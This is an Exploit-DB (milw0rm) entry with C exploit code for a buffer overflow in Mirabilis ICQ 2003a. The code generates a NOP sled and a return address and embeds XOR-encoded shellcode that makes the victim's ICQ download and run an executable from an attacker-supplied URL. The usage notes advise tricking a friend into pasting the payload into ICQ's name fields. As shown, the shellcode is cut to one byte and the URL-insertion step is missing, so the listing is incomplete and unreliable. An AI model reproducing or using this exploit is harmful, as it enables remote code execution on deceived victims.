Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit

ID EDB-ID:1277
Type exploitdb
Reporter ATmaCA
Modified 2005-10-29T00:00:00


Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit. Remote exploit for the Windows platform.

* Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com  && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan and delicon

* Usage:
* Execute the exploit; it will create "bof.txt" in the current directory.
* Open ICQ <= 2003a and click the "Add" button.
* The "Add / Invite Users to Your Contact List" dialog will open.
* Copy the content of "bof.txt" into the "First name" and "Last name" fields.
* Press the "Find" button.
* Now ICQ will download and run the server executable you specified in the WebUrl argument.
* This exploit requires social engineering skills to use. For example, you would have to
* tell your friend that you've found an easter egg and that, if he wants to see it, he has to
* type your vuln. string into the first and last name fields in ICQ and then press the Find button, etc.

* Affected versions:
* Mirabilis ICQ Pro 2003a and prior versions.
* Tested with :
* ICQ 2003a Build #3800 on Win XP Pro Sp2
* ICQ 2002a Build #3728 on Win XP Pro Sp2

#include <stdio.h>
#include <stdlib.h>   /* malloc, free (include added; the listing on the page omits it) */
#include <string.h>
#include <windows.h>

/* XOR-encode (or decode) a NUL-terminated string in place with the single-byte key 0x1d */
char *Sifrele(char *pszName1)
{
       char *pszName = pszName1;
       int Xor = 0x1d;
       int Size = strlen(pszName);
       for(int i=0;i<Size;i++)
               pszName[i] = pszName[i]^Xor;
       return pszName;
}

int main(int argc, char *argv[])
{
       if (argc < 2)
       {
               printf("\n\n\tMirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit\n");
               printf("\tBug discovered & exploit coded by ATmaCA\n");
               printf("\tWeb: http://www.spyinstructors.com  && http://www.atmacasoft.com\n");
               printf("\tE-Mail: atmaca@icqmail.com\n");
               printf("\tCredit to Kozan and delicon\n\n");

               printf(" icq_bof <WebUrl>\n");
               printf(" Example:icq_bof http://www.atmacasoft.com/small.exe\n");
               return 1; /* braces and return restored; the page's listing lost them */
       }

       /* Generic win32 http download shellcode
       xored with 0x1d by delikon (http://delikon.de/) */
       /* Only the first byte of the encoded shellcode survives on the page; the rest is not reproduced here. */
       char shellcode[] = "\xEB";

       FILE *file;

       char buf[485];
       char *web;
       short int weblength;
       char *pointer = NULL;
       char *newshellcode;

       web = argv[1];
       weblength = (short int)0xff22;
       /* locate the 0x22ff length placeholder inside the encoded shellcode */
       pointer = strstr(shellcode,"\x22\xff");
       weblength -= strlen(web)+1;
       newshellcode = (char*)malloc(sizeof(shellcode)+strlen(web)+1);
       /* The page's listing does not preserve how the URL and adjusted length are written into newshellcode. */

       if( (file = fopen("bof.txt", "w+")) == NULL )
       {
               return 1; /* error branch restored; the page's listing lost its body */
       }

       /* 480-byte NOP sled (0x90); buf[480] is NUL-terminated below so fprintf("%s") stops there */
       memset(buf, 0x90, 480);

       //ret - icqate32.dll ( jmp esp addr - [Universal]
       *(DWORD *) &buf[34]  = 0x12025c5c;
       *(DWORD *) &buf[480]  = 0x00000000;

       fprintf(file, "%s", buf);
       fclose(file);        /* added: flush and close the output file */
       free(newshellcode);  /* added: release the buffer allocated above */

       printf("\r\nbof.txt has been generated!\r\n");
       return 0;
}

// milw0rm.com [2005-10-29]